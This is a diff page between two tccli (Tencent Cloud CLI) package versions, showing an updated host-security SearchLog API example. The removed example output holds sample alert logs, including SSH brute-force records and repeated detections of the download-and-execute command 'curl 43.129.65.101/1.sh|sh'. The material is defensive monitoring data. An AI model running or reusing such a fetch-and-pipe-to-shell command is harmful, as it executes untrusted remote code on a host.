tccli 3.0.1241.1__py2.py3-none-any.whl → 3.0.1243.1__py2.py3-none-any.whl
Sign up to get free protection for your applications and to get access to all the features.
- tccli/__init__.py +1 -1
- tccli/services/apm/v20210622/api.json +216 -216
- tccli/services/apm/v20210622/examples.json +5 -5
- tccli/services/bh/v20230418/api.json +9 -0
- tccli/services/bh/v20230418/examples.json +2 -2
- tccli/services/cfs/v20190719/api.json +20 -20
- tccli/services/cfs/v20190719/examples.json +7 -7
- tccli/services/ckafka/v20190819/api.json +38 -0
- tccli/services/clb/v20180317/api.json +107 -82
- tccli/services/clb/v20180317/examples.json +14 -14
- tccli/services/cls/cls_client.py +220 -8
- tccli/services/cls/v20201016/api.json +417 -39
- tccli/services/cls/v20201016/examples.json +89 -45
- tccli/services/cwp/v20180228/api.json +3 -3
- tccli/services/cwp/v20180228/examples.json +2 -2
- tccli/services/cynosdb/v20190107/api.json +18 -18
- tccli/services/dbbrain/v20210527/api.json +1 -1
- tccli/services/dnspod/v20210323/api.json +173 -119
- tccli/services/dnspod/v20210323/examples.json +18 -18
- tccli/services/ecm/v20190719/api.json +11 -11
- tccli/services/ecm/v20190719/examples.json +1 -1
- tccli/services/emr/v20190103/api.json +896 -841
- tccli/services/ess/v20201111/api.json +18 -9
- tccli/services/ess/v20201111/examples.json +6 -0
- tccli/services/essbasic/v20210526/api.json +80 -2
- tccli/services/gaap/v20180529/api.json +16 -18
- tccli/services/goosefs/v20220519/api.json +17 -17
- tccli/services/goosefs/v20220519/examples.json +4 -4
- tccli/services/gwlb/v20240906/api.json +14 -14
- tccli/services/hunyuan/v20230901/api.json +1 -1
- tccli/services/iotexplorer/v20190423/api.json +1 -1
- tccli/services/iotvideoindustry/v20201201/api.json +244 -192
- tccli/services/iotvideoindustry/v20201201/examples.json +32 -32
- tccli/services/live/v20180801/api.json +1 -1
- tccli/services/mna/v20210119/api.json +110 -109
- tccli/services/mna/v20210119/examples.json +63 -63
- tccli/services/mps/v20190612/api.json +9 -0
- tccli/services/ocr/ocr_client.py +110 -4
- tccli/services/ocr/v20181119/api.json +370 -7
- tccli/services/ocr/v20181119/examples.json +20 -4
- tccli/services/pts/v20210728/api.json +37 -34
- tccli/services/pts/v20210728/examples.json +13 -13
- tccli/services/sqlserver/v20180328/api.json +68 -6
- tccli/services/ssl/v20191205/api.json +52 -50
- tccli/services/ssl/v20191205/examples.json +7 -7
- tccli/services/tbaas/v20180416/api.json +9 -6
- tccli/services/tbaas/v20180416/examples.json +2 -2
- tccli/services/tcb/v20180608/api.json +270 -221
- tccli/services/tcb/v20180608/examples.json +22 -22
- tccli/services/tcm/v20210413/api.json +2 -2
- tccli/services/tcm/v20210413/examples.json +2 -2
- tccli/services/tcr/v20190924/api.json +8 -8
- tccli/services/tcr/v20190924/examples.json +4 -4
- tccli/services/tdmq/tdmq_client.py +167 -8
- tccli/services/tdmq/v20200217/api.json +307 -0
- tccli/services/tdmq/v20200217/examples.json +24 -0
- tccli/services/tem/v20210701/api.json +1 -1
- tccli/services/tem/v20210701/examples.json +2 -2
- tccli/services/teo/v20220901/api.json +2 -2
- tccli/services/teo/v20220901/examples.json +3 -3
- tccli/services/thpc/v20211109/api.json +74 -100
- tccli/services/thpc/v20211109/examples.json +2 -2
- tccli/services/thpc/v20220401/api.json +196 -223
- tccli/services/thpc/v20220401/examples.json +1 -1
- tccli/services/thpc/v20230321/api.json +150 -153
- tccli/services/thpc/v20230321/examples.json +3 -3
- tccli/services/tke/v20180525/api.json +1 -1
- tccli/services/tke/v20180525/examples.json +2 -2
- tccli/services/tke/v20220501/api.json +161 -112
- tccli/services/tke/v20220501/examples.json +15 -21
- tccli/services/trocket/trocket_client.py +53 -0
- tccli/services/trocket/v20230308/api.json +219 -0
- tccli/services/trocket/v20230308/examples.json +8 -0
- tccli/services/trtc/v20190722/api.json +31 -20
- tccli/services/trtc/v20190722/examples.json +11 -11
- tccli/services/tse/v20201207/api.json +141 -113
- tccli/services/tse/v20201207/examples.json +5 -5
- tccli/services/tsf/v20180326/examples.json +1 -1
- tccli/services/vpc/v20170312/api.json +320 -270
- tccli/services/vpc/v20170312/examples.json +40 -40
- tccli/services/waf/v20180125/api.json +2 -2
- {tccli-3.0.1241.1.dist-info → tccli-3.0.1243.1.dist-info}/METADATA +2 -2
- {tccli-3.0.1241.1.dist-info → tccli-3.0.1243.1.dist-info}/RECORD +86 -86
- {tccli-3.0.1241.1.dist-info → tccli-3.0.1243.1.dist-info}/WHEEL +0 -0
- {tccli-3.0.1241.1.dist-info → tccli-3.0.1243.1.dist-info}/entry_points.txt +0 -0
- {tccli-3.0.1241.1.dist-info → tccli-3.0.1243.1.dist-info}/license_files/LICENSE +0 -0
@@ -4035,8 +4035,8 @@
|
|
4035
4035
|
"SearchLog": [
|
4036
4036
|
{
|
4037
4037
|
"document": "",
|
4038
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: SearchLog\n<公共请求参数>\n\n{\n \"Sort\": \"desc\",\n \"Count\": \"20\",\n \"QueryString\": \"status: \\\"异常登录\\\" AND public_ip_addresses: (1* OR 2*
|
4039
|
-
"output": "{\n \"Response\": {\n \"Analysis\": false,\n \"Context\": \"content\",\n \"Count\": 17,\n \"Data\": [\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-20/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-5704\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin 4.6.x 表结构页面存在XSS漏洞\\\",\\\"id\\\":\\\"771\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://httpd.apache.org/security/vulnerabilities_24.html\\\",\\\"path\\\":\\\"\\\",\\\"fix\\\":\\\"升级至2.4.6-90及以上版本或 2.4.39及以上版本\\\",\\\"cve_id\\\":\\\"CVE-2019-0217\\\",\\\"cls_event_type\\\":\\\"application_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"Apache HTTP Server mod_auth_digest 条件竞争漏洞\\\",\\\"id\\\":\\\"767\\\",\\\"vul_category\\\":\\\"应用漏洞\\\",\\\"descript\\\":\\\"Apache HTTP Server 启用了 mod_auth_digest 模块,且Apache HTTP Server 版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"True\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-19/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-5703\\\",\\\"cls_event_type\\\":\\\"emergency_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin central_columns.lib.php SQL注入漏洞\\\",\\\"id\\\":\\\"772\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/central_columns.lib.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.seebug.org/vuldb/ssvid-92512\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、升级到最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-6633\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin dbase extension 远程代码执行漏洞\\\",\\\"id\\\":\\\"764\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/zip_extension.lib.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490\\\",\\\"path\\\":\\\"\\\",\\\"fix\\\":\\\"升级 Apache HTTP Server到 2.4.46 版本\\\",\\\"cve_id\\\":\\\"CVE-2020-9490\\\",\\\"cls_event_type\\\":\\\"application_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"Apache HTTP Server http2_module 拒绝服务漏洞\\\",\\\"id\\\":\\\"769\\\",\\\"vul_category\\\":\\\"应用漏洞\\\",\\\"descript\\\":\\\"Apache HTTP Server 启用了 mod_http2 模块,且Apache HTTP Server版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"True\\\",\\\"reference\\\":\\\"https://www.seebug.org/vuldb/ssvid-92209\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级至官方最新版本并且避免使用弱密码;\\\",\\\"cve_id\\\":\\\"CVE-2016-5734\\\",\\\"cls_event_type\\\":\\\"emergency_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin授权用户远程命令执行漏洞\\\",\\\"id\\\":\\\"768\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/controllers/table/TableSearchController.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-40/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-6617\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin 4.6.x 导出功能SQL注入漏洞\\\",\\\"id\\\":\\\"765\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/display_export.lib.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-25/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-5732\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin 4.6.x XSS漏洞\\\",\\\"id\\\":\\\"770\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_partitions.phtml\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11984\\\",\\\"path\\\":\\\"\\\",\\\"fix\\\":\\\"升级至2.4.44及以上版本\\\",\\\"cve_id\\\":\\\"CVE-2020-11984\\\",\\\"cls_event_type\\\":\\\"application_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"Apache HTTP Server mod_proxy_uwsgi 缓冲区溢出漏洞\\\",\\\"id\\\":\\\"766\\\",\\\"vul_category\\\":\\\"应用漏洞\\\",\\\"descript\\\":\\\"Apache HTTP Server 启用了 mod_proxy_uwsgi 模块,且版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-06-30 11:01:55 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.133\\\",\\\"modify_time\\\":\\\"2022-07-01 10:15:23 +0800 CST\\\",\\\"count\\\":\\\"3380\\\",\\\"uuid\\\":\\\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\\\",\\\"src_ip\\\":\\\"82.157.124.14\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"北京-北京市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001705\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641844000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-06-30 11:01:55 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.133\\\",\\\"modify_time\\\":\\\"2022-07-01 10:15:23 +0800 CST\\\",\\\"count\\\":\\\"3380\\\",\\\"uuid\\\":\\\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\\\",\\\"src_ip\\\":\\\"82.157.124.14\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"北京-北京市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001705\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641824000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:10:03 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:10:01 +0800 CST\\\",\\\"id\\\":\\\"3141559\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641520000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 07:44:58 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.79\\\",\\\"modify_time\\\":\\\"2022-07-01 10:09:23 +0800 CST\\\",\\\"count\\\":\\\"349\\\",\\\"uuid\\\":\\\"93137e79-ae2e-4677-95ac-23a5024607b1\\\",\\\"src_ip\\\":\\\"110.40.168.164\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"上海-上海市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001999\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641484000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 07:44:58 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.79\\\",\\\"modify_time\\\":\\\"2022-07-01 10:09:23 +0800 CST\\\",\\\"count\\\":\\\"349\\\",\\\"uuid\\\":\\\"93137e79-ae2e-4677-95ac-23a5024607b1\\\",\\\"src_ip\\\":\\\"110.40.168.164\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"上海-上海市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001999\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641464000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:07:04 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:07:01 +0800 CST\\\",\\\"id\\\":\\\"3141558\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641280000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:05:04 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:05:01 +0800 CST\\\",\\\"id\\\":\\\"3141557\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641160000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:04:05 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:04:01 +0800 CST\\\",\\\"id\\\":\\\"3141556\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641160000\n }\n ],\n \"ListOver\": true,\n \"RequestId\": \"e6bb2f6d-10b3-40fd-b3a4-630dbdf477c3\"\n }\n}",
|
4038
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: SearchLog\n<公共请求参数>\n\n{\n \"Sort\": \"desc\",\n \"Count\": \"20\",\n \"QueryString\": \"status: \\\"异常登录\\\" AND public_ip_addresses: (1* OR 2*) AND NOT hostip: (10.128.200.* OR 10.129.24.212) AND NOT src_ip: (10.128.128.7 OR 192.144.182.173)\",\n \"StartTime\": \"1656641065449\",\n \"EndTime\": \"1656641965449\"\n}",
|
4039
|
+
"output": "{\n \"Response\": {\n \"Analysis\": false,\n \"Context\": \"content\",\n \"Count\": 2,\n \"Data\": [\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-20/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-5704\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin 4.6.x 表结构页面存在XSS漏洞\\\",\\\"id\\\":\\\"771\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://httpd.apache.org/security/vulnerabilities_24.html\\\",\\\"path\\\":\\\"\\\",\\\"fix\\\":\\\"升级至2.4.6-90及以上版本或 2.4.39及以上版本\\\",\\\"cve_id\\\":\\\"CVE-2019-0217\\\",\\\"cls_event_type\\\":\\\"application_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"Apache HTTP Server mod_auth_digest 条件竞争漏洞\\\",\\\"id\\\":\\\"767\\\",\\\"vul_category\\\":\\\"应用漏洞\\\",\\\"descript\\\":\\\"Apache HTTP Server 启用了 mod_auth_digest 模块,且Apache HTTP Server 版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"\",\n \"TimeStamp\": 1656641946000\n }\n ],\n \"ListOver\": true,\n \"RequestId\": \"e6bb2f6d-10b3-40fd-b3a4-630dbdf477c3\"\n }\n}",
|
4040
4040
|
"title": "示例"
|
4041
4041
|
}
|
4042
4042
|
],
|
@@ -7146,7 +7146,7 @@
|
|
7146
7146
|
{
|
7147
7147
|
"disabled": false,
|
7148
7148
|
"document": "用户appId",
|
7149
|
-
"example": "
|
7149
|
+
"example": "251232125",
|
7150
7150
|
"member": "int64",
|
7151
7151
|
"name": "AppId",
|
7152
7152
|
"output_required": true,
|
@@ -7156,7 +7156,7 @@
|
|
7156
7156
|
{
|
7157
7157
|
"disabled": false,
|
7158
7158
|
"document": "集群ID",
|
7159
|
-
"example": "
|
7159
|
+
